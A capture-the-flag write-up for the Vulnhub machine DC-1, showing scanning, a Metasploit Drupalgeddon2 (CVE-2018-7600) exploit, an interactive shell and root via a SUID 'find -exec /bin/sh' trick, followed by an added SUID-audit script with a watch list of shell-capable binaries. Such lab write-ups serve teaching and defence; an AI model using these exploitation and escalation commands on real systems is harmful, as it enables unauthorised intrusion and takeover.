Vulnhub Write-up: DC-1

This is a write-up of the machine DC-1:1 from Vulnhub.

DIGEST

DC-1 is a beginner-friendly machine based on a Linux platform. Drupal 7 is running on the web server. Using a Drupal 7 exploit we gain the initial shell, and by exploiting chmod (SUID) bits we gain root.

Machine Author: DCAU7
Machine Type: Linux
Machine Level: Beginner

Know-How

  • Nmap
  • Searchsploit

Absorb Skills

  • CVE-2018-7600
  • Drupal Drupalgeddon 2 Forms API Property Injection
  • Linux Privilege Escalation using Find
  • Droopescan

Installation, Networking and Finding the IP

Installation: I am using Parrot OS as the host and VirtualBox to install the vulnerable machine (DC-1:1).

Networking: I am using a Bridged Adapter to connect the vulnerable machine and the host.


Finding the IP:

$ netdiscover

192.168.0.1 is the router IP and 192.168.0.191 is the host machine.

192.168.0.185 is the vulnerable machine; I ran a quick nmap scan to confirm it.


Scanning The Network

$ nmap -sC -sV 192.168.0.185

There is a Drupal server running on port 80. Nmap shows the version is 7; let's confirm with Droopescan.

Droopescan is a Python-based scanner that helps security researchers find basic risks in the installed version of Drupal.

$ droopescan scan drupal -u http://192.168.0.185/

Droopescan gives the possible version as 7.22 to 7.26.

$ searchsploit drupal 7
msf5 > search Drupalgeddon

Exploitation

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.0.185
RHOSTS => 192.168.0.185
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
meterpreter > sysinfo

Getting the Interactive Shell

meterpreter > shell
/bin/bash -i

/bin/bash -i gives an interactive shell, a fancy command from Metasploit :D

meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'

With the help of the Python pty module we can get an interactive shell.


There are many ways to get an interactive shell; feel free to comment with your way of getting one. :)


Privilege Escalation

$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

find looks different: we can execute a command on its results, so let's try this.

ls /root gives us Permission denied, but with the help of find /root we can see the files.

find /root
$ find /root/thefinalflag.txt -exec cat {} \;
$ find /root/thefinalflag.txt -exec /bin/sh \;
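
The escalation above works because find carries the SUID bit and can run other programs. As an added example (not part of the original write-up), the script below audits a directory tree for SUID/SGID files and flags the ones on a watch list; the RISKY_NAMES list and the function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original write-up: list SUID/SGID files under a
# directory and flag the ones that can run other commands (find, on DC-1).

# Assumption: constructed watch list of programs able to execute arbitrary
# commands or spawn a shell; extend it for your own systems.
RISKY_NAMES="find vim vi nmap less more awk bash sh dash python perl env tar"

# audit_suid ROOT
# Prints one line per SUID/SGID regular file: "<label> <mode> <owner> <path>",
# where label is RISK for watch-listed names and INFO otherwise.
audit_suid() {
    root=${1:-/}
    # -xdev: stay on one filesystem; -type f: skip symlinks and directories.
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r path; do
        name=${path##*/}
        # Fields of ls -ld: mode string, link count, owner, group, ...
        set -- $(ls -ld "$path")
        case " $RISKY_NAMES " in
            *" $name "*) label=RISK ;;
            *)           label=INFO ;;
        esac
        printf '%s %s %s %s\n' "$label" "$1" "$3" "$path"
    done
}

# risky_suid_count ROOT: number of RISK findings, for use in cron or CI checks.
risky_suid_count() {
    audit_suid "$1" | grep -c '^RISK ' || true
}

# Run as a script: ./audit_suid.sh /usr
# A RISK finding is fixed by dropping the bit, e.g. chmod u-s <path>.
if [ -n "${1:-}" ]; then
    audit_suid "$1"
fi
```

On a machine configured like DC-1 the find binary would appear as a RISK line owned by root; removing its SUID bit closes this escalation path.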


❤️ by inc0gnito